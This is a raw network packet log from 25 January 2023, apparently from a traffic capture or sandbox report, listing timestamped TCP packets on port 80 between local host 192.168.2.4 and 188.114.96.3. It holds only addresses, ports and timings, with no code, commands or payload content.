Jan 25, 2023 09:28:12.864573002 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864595890 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864605904 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864629984 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864639044 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864660978 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864670992 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864695072 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864702940 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864731073 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864733934 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864759922 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864768982 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864788055 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864800930 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864825964 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864833117 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864860058 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864866018 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864886999 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864897013 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864922047 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864952087 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.865195990 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.865225077 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.865251064 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.865253925 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.865271091 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.865307093 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.871835947 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.871865988 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.871897936 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.871915102 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.871927023 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.871957064 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.871978045 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.871978045 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.871989012 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.872013092 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.872021914 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.872042894 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.872052908 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.872071981 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.872090101 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.872121096 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.872126102 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.872153997 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.872159958 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.872185946 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.872189045 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.872220039 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.872221947 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.872251034 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.872251987 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.872282982 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.872308969 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.872315884 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.872335911 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.872373104 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.872373104 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.872373104 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.872414112 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.880557060 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.880669117 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.881309032 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.881339073 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.881376028 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.881469011 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.537008047 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.537075996 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.554420948 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.554475069 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.662880898 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.662955046 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.663103104 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.819053888 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.819142103 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.836380959 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.836433887 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.897762060 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.897855043 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.897908926 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.897941113 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.897995949 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.898042917 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.898065090 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.898113012 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.898159027 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.898180962 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.898228884 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.898276091 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.898297071 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.898341894 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.898394108 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.898410082 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.898452997 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.898514032 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.940879107 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.940964937 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.941013098 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.941059113 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.941102982 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.941133976 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.941169024 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.941221952 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.941272020 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.941323042 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.941356897 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.941382885 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.941412926 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.941462040 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.941504002 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.941551924 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.941572905 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.941610098 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.941637039 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.941687107 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.941735029 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.941782951 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.941806078 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.941848040 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.941886902 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.941940069 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.941986084 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.942032099 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.942054033 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.942094088 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.942107916 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.942152977 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.942199945 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.942246914 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.942267895 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.942306042 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.942325115 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.990186930 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.990252018 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.990305901 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.990345955 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.990376949 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.990408897 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.990463972 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.990509033 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.990556955 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.990578890 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.990617990 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.990643978 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.990714073 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.990771055 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.990816116 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.990838051 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.990880013 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.990902901 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.990951061 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.991008997 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.991055965 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.991076946 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.991122961 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.991142035 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.991190910 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.991240978 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.991288900 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.991311073 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.991348028 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.991375923 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.991431952 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.991554976 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.991605997 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.991627932 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.991674900 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.991694927 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.991743088 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.991795063 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.991841078 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.991877079 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.991909981 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.991941929 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.991988897 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.992033958 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.992086887 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.992103100 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.992141008 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.992166996 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.992214918 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.992263079 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.992316961 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.992331982 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.992369890 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.992393017 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.992439032 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.992486000 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.992538929 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.992552996 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.992590904 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.992616892 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.992664099 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.992713928 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.992767096 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.992779970 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.992815018 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:20.992842913 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.992892027 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.992928982 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:20.992984056 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.028260946 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.028325081 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.028400898 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.028429985 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.028486967 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.028505087 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.028552055 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.028599977 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.028646946 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.028672934 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.028721094 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.028738976 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.028785944 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.028842926 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.028903008 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.028918028 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.028959990 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.028985023 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.029031992 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.029073954 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.029119968 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.029143095 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.029182911 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.029217958 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.029263973 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.029309034 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.029349089 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.029370070 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.029406071 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.029436111 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.029485941 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.029558897 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.029603958 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.029625893 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.029670954 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.029690981 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.029730082 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.029778004 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.029824972 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.029849052 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.029882908 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.029917002 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.029968023 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.030016899 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.030064106 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.030085087 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.030122995 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.030147076 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.030193090 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.030240059 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.030286074 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.030308008 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.030347109 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.030371904 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.030417919 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.030459881 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.030505896 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.030525923 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.030561924 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.030591965 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.030643940 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.030710936 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.030776978 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.030791044 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.030836105 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.030853987 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.030905962 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.030951023 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.030997038 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.031019926 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.031055927 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.031088114 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.031137943 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.031187057 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.031234980 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.031256914 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.031295061 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.031321049 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.031368971 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.031418085 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.031440973 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.031486034 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.031533003 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.031579971 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.031600952 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.031646013 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.031665087 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.031712055 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.031759024 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.031805038 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.031826973 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.031863928 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.031888962 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.031943083 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.031987906 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.032036066 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.032056093 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.032088041 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.032121897 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.032171965 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.032218933 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.032265902 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.032288074 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.032329082 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.032352924 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.032398939 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.032448053 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.032494068 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.032516003 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.032550097 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.032579899 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.032629013 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.032677889 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.032725096 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.032747984 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.032793999 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.032814026 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.032864094 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.032916069 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.032965899 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.032987118 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.033021927 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.033044100 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.033126116 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.033175945 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.033226013 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.033251047 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.033284903 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.033314943 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.033371925 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.033421040 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.033468962 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.033489943 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.033524990 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.033556938 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.033606052 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.033654928 CET	80	49736	188.114.96.3	192.168.2.4
